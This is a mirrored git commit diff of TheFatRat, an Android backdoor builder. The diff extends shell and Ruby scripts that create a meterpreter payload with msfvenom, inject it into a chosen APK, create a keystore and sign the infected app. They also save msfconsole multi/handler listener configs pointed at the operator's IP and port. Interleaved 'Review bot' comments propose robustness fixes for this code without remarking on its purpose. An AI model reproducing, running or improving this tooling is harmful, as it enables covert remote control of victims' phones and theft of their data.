mirror of
https://github.com/Screetsec/TheFatRat.git
synced 2023-12-14 02:02:58 +01:00
commit
535c4eb3a2
|
@ -1,5 +1,6 @@
|
||||||
## CHANGELOG
|
## CHANGELOG
|
||||||
|
|
||||||
|
* v1.9.2 - New signing process in old method backdoor apk & option to create listener
|
||||||
* v1.9.2 - Implemented possibility for user to save msfconsole listeners
|
* v1.9.2 - Implemented possibility for user to save msfconsole listeners
|
||||||
* v1.9.2 - Fixes in Microsploit
|
* v1.9.2 - Fixes in Microsploit
|
||||||
* v1.9.2 - Implemented local ip , public ip & hostname display to powerfull.sh
|
* v1.9.2 - Implemented local ip , public ip & hostname display to powerfull.sh
|
||||||
|
|
14
backdoor_apk
14
backdoor_apk
|
@ -589,3 +589,17 @@ echo -ne $green" Your RAT apk was successfully builded and signed , it is locate
|
||||||
$MY_PATH/backdoored/app_backdoor.apk"
|
$MY_PATH/backdoored/app_backdoor.apk"
|
||||||
rm -rf temp/* > /dev/null 2>&1
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
fi
|
fi
|
||||||
|
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
|
||||||
|
if [ $? = 0 ] ; then
|
||||||
|
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk");
|
||||||
|
svf=$path/config/listeners/$save.rc
|
||||||
|
rm -rf $svf >/dev/null 2>&1
|
||||||
|
payloads=`sed -n 3p $apkconf`
|
||||||
|
yourip=`sed -n 4p $apkconf`
|
||||||
|
yourport=`sed -n 5p $apkconf`
|
||||||
|
echo "use exploit/multi/handler" > $svf
|
||||||
|
echo "set PAYLOAD $payloads" >> $svf
|
||||||
|
echo "set LHOST $yourip" >> $svf
|
||||||
|
echo "set LPORT $yourport" >> $svf
|
||||||
|
echo "exploit -j" >> $svf
|
||||||
|
echo -e okegreen "Configuration file saved to $list/$save.rc"
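Review bot: The name returned by the `zenity --entry` dialog goes unvalidated and unquoted into `svf=$path/config/listeners/$save.rc` and then into `rm -rf $svf`, so an empty reply (dialog cancelled), a name with spaces, or one containing `../` makes the delete and the following `>`/`>>` redirects act on paths outside `config/listeners`. I would reject the name before the path is built when it is empty or contains `/`, use `rm -f -- "$svf"` instead of the recursive form, and quote `"$svf"` in every redirect. The same block is added to `fatrat` in the "Use old Fatrat method" branch (its `save=` / `svf=` / `rm -rf $svf` lines) and needs the same change. Two smaller things here: the last line prints the literal word `okegreen` because the `$` is missing, and no closing `fi` for `if [ $? = 0 ]` is visible among the added lines, so please confirm the file still parses.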
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Folder Location for created Rat apks
|
Folder Location for created Rat apks
|
||||||
|
|
123
fatrat
Normal file → Executable file
123
fatrat
Normal file → Executable file
|
@ -22,7 +22,7 @@ okegreen='\033[92m'
|
||||||
lightgreen='\e[1;32m'
|
lightgreen='\e[1;32m'
|
||||||
white='\e[1;37m'
|
white='\e[1;37m'
|
||||||
red='\e[1;31m'
|
red='\e[1;31m'
|
||||||
yellow='\e[1;33m'
|
yellow='\e[0;33m'
|
||||||
BlueF='\e[1;34m' #Biru
|
BlueF='\e[1;34m' #Biru
|
||||||
RESET="\033[00m" #normal
|
RESET="\033[00m" #normal
|
||||||
orange='\e[38;5;166m'
|
orange='\e[38;5;166m'
|
||||||
|
@ -77,6 +77,7 @@ lanip=`ip addr | grep 'state UP' -A2 | tail -n1 | awk '{print $2}' | cut -f1 -d'
|
||||||
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
|
publicip=`dig +short myip.opendns.com @resolver1.opendns.com`
|
||||||
hostn=`host $publicip | awk '{print $5}'`
|
hostn=`host $publicip | awk '{print $5}'`
|
||||||
list=$path/config/listeners
|
list=$path/config/listeners
|
||||||
|
log=$path/logs/apk-old.log
|
||||||
|
|
||||||
# spinner for Metasploit Generator
|
# spinner for Metasploit Generator
|
||||||
spinlong ()
|
spinlong ()
|
||||||
|
@ -179,6 +180,8 @@ backdoor=`sed -n 16p $file`
|
||||||
searchsploit=`sed -n 17p $file`
|
searchsploit=`sed -n 17p $file`
|
||||||
aapt=`sed -n 11p $file`
|
aapt=`sed -n 11p $file`
|
||||||
apktool=`sed -n 12p $file`
|
apktool=`sed -n 12p $file`
|
||||||
|
keytool=`sed -n 7p $file`
|
||||||
|
sign=`sed -n 5p $file`
|
||||||
|
|
||||||
else
|
else
|
||||||
echo -e $red"Configuration file does not exists , run setup.sh first for config ."
|
echo -e $red"Configuration file does not exists , run setup.sh first for config ."
|
||||||
|
@ -1678,32 +1681,78 @@ menu
|
||||||
;;
|
;;
|
||||||
|
|
||||||
"Use old Fatrat method")
|
"Use old Fatrat method")
|
||||||
echo ""
|
echo -e $okegreen ""
|
||||||
spinlong
|
spinlong
|
||||||
|
|
||||||
|
#removing previous logs
|
||||||
|
rm -rf $log >/dev/null 2>&1
|
||||||
|
touch $log >/dev/null 2>&1
|
||||||
|
|
||||||
outf="app_backdoored.apk"
|
outf="app_backdoored.apk"
|
||||||
gboor2
|
gboor2
|
||||||
echo "Creating RAT payload with msfvenom"
|
|
||||||
echo -e $okegreen ""
|
echo -e $okegreen ""
|
||||||
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk
|
echo "[*] Creating RAT payload with msfvenom"
|
||||||
echo "Done !"
|
|
||||||
|
#Creating payload and storing info in logfile
|
||||||
|
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/temp/payload.apk >>$log /dev/null 2>&1
|
||||||
|
|
||||||
|
#Checking if payload exists
|
||||||
|
pld=$path/temp/payload.apk
|
||||||
|
if [ -f "$pld" ]
|
||||||
|
then
|
||||||
|
echo "[✔] Done!"
|
||||||
|
else
|
||||||
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error in the creation of the payload .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
menu
|
||||||
|
fi
|
||||||
sleep 2
|
sleep 2
|
||||||
echo "Starting the merging process of RAT with the APK you selected"
|
echo "[*] Creating a Valid Certificate"
|
||||||
echo ""
|
|
||||||
ruby $apkembed $path/temp/app.apk
|
#Creating certificate and storing info in logfile
|
||||||
echo ""
|
$keytool -genkey -v -keystore $path/temp/debug.keystore -storepass android -alias androiddebugkey -keypass android -dname "CN=Android Debug,O=Android,C=US" -keyalg RSA -keysize 2048 -validity 10000 >>$log 2>&1
|
||||||
|
|
||||||
|
#Checking if certificate was created
|
||||||
|
cert=$path/temp/debug.keystore
|
||||||
|
if [ -f "$cert" ]
|
||||||
|
then
|
||||||
|
echo "[✔] Done!"
|
||||||
|
else
|
||||||
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error creating a valid certificate .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
menu
|
||||||
|
fi
|
||||||
sleep 2
|
sleep 2
|
||||||
|
|
||||||
|
echo "[*] Starting the merging process of RAT with the APK you selected"
|
||||||
|
echo -e $okegreen ""
|
||||||
|
|
||||||
|
#Starting the process of inserting the payload into original apk file
|
||||||
|
ruby $apkembed $path/temp/app.apk
|
||||||
|
sleep 2
|
||||||
|
|
||||||
|
echo -e $okegreen ""
|
||||||
|
#Checking if backdoor apk was created succefully
|
||||||
fiapk=$path/temp/app_backdoored.apk
|
fiapk=$path/temp/app_backdoored.apk
|
||||||
if [ -f "$fiapk" ]
|
if [ -f "$fiapk" ]
|
||||||
then
|
then
|
||||||
echo -e $green "[*] Backdoor apk created sucefully"
|
echo "[✔] Done!"
|
||||||
|
sleep 1
|
||||||
|
echo "[*] Signing your Rat APK"
|
||||||
|
$sign -verbose -keystore $path/temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $path/temp/app_backdoored.apk androiddebugkey >>$log 2>&1
|
||||||
|
echo "[✔] Done!"
|
||||||
else
|
else
|
||||||
echo -e $red "[!] There was an error in the creation of your RAT APK file , the possible reasons are :
|
echo $red ""
|
||||||
|
echo "[x] There was an error in the creation of your RAT APK file , the possible reasons are :
|
||||||
- The architecture of the file is not for android
|
- The architecture of the file is not for android
|
||||||
- The original APK is protected
|
- The original APK is protected
|
||||||
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)"
|
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)
|
||||||
echo -e $green ""
|
Check log file at : $log"
|
||||||
rm -rf temp/* > /dev/null 2>&1
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
||||||
menu
|
menu
|
||||||
fi
|
fi
|
||||||
|
@ -1714,28 +1763,58 @@ ren=`shuf -i 1-1000 -n 1`
|
||||||
back=$path/backdoored/app_backdoored.apk
|
back=$path/backdoored/app_backdoored.apk
|
||||||
if [ -f "$back" ]
|
if [ -f "$back" ]
|
||||||
then
|
then
|
||||||
mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk
|
mv $path/backdoored/app_backdoored.apk $path/backdoored/app_backdoored_$ren.apk >>$log 2>&1
|
||||||
echo -e $yellow "FatRat Detected that you already had a previous created backdoor
|
echo -e $yellow ""
|
||||||
|
echo "[!] FatRat Detected that you already had a previous created backdoor
|
||||||
file in ($path/backdoored/) with the name app_backdoored.apk ."
|
file in ($path/backdoored/) with the name app_backdoored.apk ."
|
||||||
echo -e $okegreen "FatRat have renamed your old backdoor to app_backdoored_$ren.apk"
|
echo -e $okegreen ""
|
||||||
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk
|
echo "[✔] FatRat have renamed your old backdoor to app_backdoored_$ren.apk"
|
||||||
|
|
||||||
|
# Moving apk backdoor to final destination
|
||||||
|
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
|
||||||
|
|
||||||
|
# Removing temp files
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
else
|
else
|
||||||
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk
|
|
||||||
|
|
||||||
|
# Moving apk backdoor to final destination
|
||||||
|
mv $path/temp/app_backdoored.apk $path/backdoored/app_backdoored.apk >>$log 2>&1
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
fi
|
fi
|
||||||
|
|
||||||
varopt="$path/backdoored/app_backdoored.apk"
|
varopt="$path/backdoored/app_backdoored.apk"
|
||||||
if [ ! -f $varopt ]; then
|
if [ ! -f $varopt ]; then
|
||||||
echo -e $red "[!] There was an error copying your Rat app to final destination"
|
echo -e $red ""
|
||||||
|
echo "[x] There was an error copying your Rat app to final destination .
|
||||||
|
Check log file at : $log"
|
||||||
|
rm -rf temp/* > /dev/null 2>&1
|
||||||
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
|
||||||
menu
|
menu
|
||||||
fi
|
fi
|
||||||
|
|
||||||
echo -e $yellow "Your payload has been successfully & signed and it is located at :
|
echo -e $green ""
|
||||||
|
echo "Your payload has been successfully & signed and it is located at :
|
||||||
$path/backdoored/app_backdoored.apk"
|
$path/backdoored/app_backdoored.apk"
|
||||||
sleep 2
|
sleep 2
|
||||||
echo -e $okegreen "Removing temporary files"
|
echo -e $okegreen ""
|
||||||
|
echo "[*] Removing temporary files"
|
||||||
sleep 2
|
sleep 2
|
||||||
rm -rf $path/temp/* >/dev/null 2>&1
|
rm -rf $path/temp/* >/dev/null 2>&1
|
||||||
|
echo "[✔] Done!"
|
||||||
|
zenity --question --text="`printf "Do you want to create a listener for this configuration \n to use in msfconsole in future ?"`"
|
||||||
|
if [ $? = 0 ] ; then
|
||||||
|
save=$(zenity --entry --title="Save Msfconsole Config" --width=100 --height=100 --text="Write the name for this config." --entry-text="myapk");
|
||||||
|
svf=$path/config/listeners/$save.rc
|
||||||
|
rm -rf $svf >/dev/null 2>&1
|
||||||
|
echo "use exploit/multi/handler" > $svf
|
||||||
|
echo "set PAYLOAD $payload" >> $svf
|
||||||
|
echo "set LHOST $yourip" >> $svf
|
||||||
|
echo "set LPORT $yourport" >> $svf
|
||||||
|
echo "exploit -j" >> $svf
|
||||||
|
echo -e $okegreen "Configuration file saved to $list/$save.rc"
|
||||||
|
fi
|
||||||
echo -e $okegreen ""
|
echo -e $okegreen ""
|
||||||
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
read -rsp $'Press any key to return to fatrat menu\n' -n 1 key
|
||||||
echo
|
echo
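Review bot: The cleanup lines added in the new error branches and after the final `mv` are written as `rm -rf temp/* > /dev/null 2>&1`, a glob relative to the current directory, while every other path in these hunks is anchored at `$path` (including the later `rm -rf $path/temp/*`). Run from another directory, this deletes the contents of whatever `temp/` happens to be there and leaves the generated `debug.keystore` and `payload.apk` behind in `$path/temp`, with any error hidden by the redirect. I would write each of them as `rm -rf -- "${path:?}/temp/"*`, which also aborts if `path` is unset instead of expanding to `/temp/*`. The `case` branch these lines belong to starts and ends outside the hunk, so whether `menu` returns into the code that follows could not be checked from here.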
|
||||||
|
|
|
@ -1 +1 @@
|
||||||
Don't Delete the Folder and dont change directory name , if you change you must change the script too
|
Don't Delete the Folder and dont change directory name , if you change you must change the script too
|
||||||
|
|
1
setup.sh
Normal file → Executable file
1
setup.sh
Normal file → Executable file
|
@ -209,7 +209,6 @@ which ruby >> $log 2>&1
|
||||||
sleep 2
|
sleep 2
|
||||||
fi
|
fi
|
||||||
|
|
||||||
|
|
||||||
#Checking if Jarsigner exists
|
#Checking if Jarsigner exists
|
||||||
which jarsigner > /dev/null 2>&1
|
which jarsigner > /dev/null 2>&1
|
||||||
if [ "$?" -eq "0" ]; then
|
if [ "$?" -eq "0" ]; then
|
||||||
|
|
|
@ -1 +0,0 @@
|
||||||
Don't Delete the Folder temp and dont change directory name , if you change you must change the scripttoo
|
|
|
@ -153,7 +153,7 @@ unless(apk_v.split()[1].include?("v2."))
|
||||||
end
|
end
|
||||||
|
|
||||||
print "[*] Signing payload..\n"
|
print "[*] Signing payload..\n"
|
||||||
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`
|
`jarsigner -verbose -keystore temp/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA 'temp/payload.apk' androiddebugkey`
|
||||||
|
|
||||||
`rm -rf temp/original`
|
`rm -rf temp/original`
|
||||||
`rm -rf temp/payload`
|
`rm -rf temp/payload`
|
||||||
|
@ -204,7 +204,5 @@ fix_manifest()
|
||||||
|
|
||||||
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
|
print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"
|
||||||
`apktool b -o #{injected_apk} temp/original`
|
`apktool b -o #{injected_apk} temp/original`
|
||||||
print "[*] Signing #{injected_apk} ..\n"
|
|
||||||
`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`
|
|
||||||
|
|
||||||
puts "[+] Infected file #{injected_apk} ready.\n"
|
puts "[+] Infected file #{injected_apk} ready.\n"
|
||||||
|
|
|
@ -1,27 +0,0 @@
|
||||||
-----BEGIN CERTIFICATE-----
|
|
||||||
MIIEqDCCA5CgAwIBAgIJAJNurL4H8gHfMA0GCSqGSIb3DQEBBQUAMIGUMQswCQYD
|
|
||||||
VQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4g
|
|
||||||
VmlldzEQMA4GA1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UE
|
|
||||||
AxMHQW5kcm9pZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTAe
|
|
||||||
Fw0wODAyMjkwMTMzNDZaFw0zNTA3MTcwMTMzNDZaMIGUMQswCQYDVQQGEwJVUzET
|
|
||||||
MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4G
|
|
||||||
A1UEChMHQW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9p
|
|
||||||
ZDEiMCAGCSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbTCCASAwDQYJKoZI
|
|
||||||
hvcNAQEBBQADggENADCCAQgCggEBANaTGQTexgskse3HYuDZ2CU+Ps1s6x3i/waM
|
|
||||||
qOi8qM1r03hupwqnbOYOuw+ZNVn/2T53qUPn6D1LZLjk/qLT5lbx4meoG7+yMLV4
|
|
||||||
wgRDvkxyGLhG9SEVhvA4oU6Jwr44f46+z4/Kw9oe4zDJ6pPQp8PcSvNQIg1QCAcy
|
|
||||||
4ICXF+5qBTNZ5qaU7Cyz8oSgpGbIepTYOzEJOmc3Li9kEsBubULxWBjf/gOBzAzU
|
|
||||||
RNps3cO4JFgZSAGzJWQTT7/emMkod0jb9WdqVA2BVMi7yge54kdVMxHEa5r3b97s
|
|
||||||
zI5p58ii0I54JiCUP5lyfTwE/nKZHZnfm644oLIXf6MdW2r+6R8CAQOjgfwwgfkw
|
|
||||||
HQYDVR0OBBYEFEhZAFY9JyxGrhGGBaR0GawJyowRMIHJBgNVHSMEgcEwgb6AFEhZ
|
|
||||||
AFY9JyxGrhGGBaR0GawJyowRoYGapIGXMIGUMQswCQYDVQQGEwJVUzETMBEGA1UE
|
|
||||||
CBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNTW91bnRhaW4gVmlldzEQMA4GA1UEChMH
|
|
||||||
QW5kcm9pZDEQMA4GA1UECxMHQW5kcm9pZDEQMA4GA1UEAxMHQW5kcm9pZDEiMCAG
|
|
||||||
CSqGSIb3DQEJARYTYW5kcm9pZEBhbmRyb2lkLmNvbYIJAJNurL4H8gHfMAwGA1Ud
|
|
||||||
EwQFMAMBAf8wDQYJKoZIhvcNAQEFBQADggEBAHqvlozrUMRBBVEY0NqrrwFbinZa
|
|
||||||
J6cVosK0TyIUFf/azgMJWr+kLfcHCHJsIGnlw27drgQAvilFLAhLwn62oX6snb4Y
|
|
||||||
LCBOsVMR9FXYJLZW2+TcIkCRLXWG/oiVHQGo/rWuWkJgU134NDEFJCJGjDbiLCpe
|
|
||||||
+ZTWHdcwauTJ9pUbo8EvHRkU3cYfGmLaLfgn9gP+pWA7LFQNvXwBnDa6sppCccEX
|
|
||||||
31I828XzgXpJ4O+mDL1/dBd+ek8ZPUP0IgdyZm5MTYPhvVqGCHzzTy3sIeJFymwr
|
|
||||||
sBbmg2OAUNLEMO6nwmocSdN2ClirfxqCzJOLSDE4QyS9BAH6EhY6UFcOaE0=
|
|
||||||
-----END CERTIFICATE-----
|
|
BIN
tools/key.pk8
BIN
tools/key.pk8
Binary file not shown.
Binary file not shown.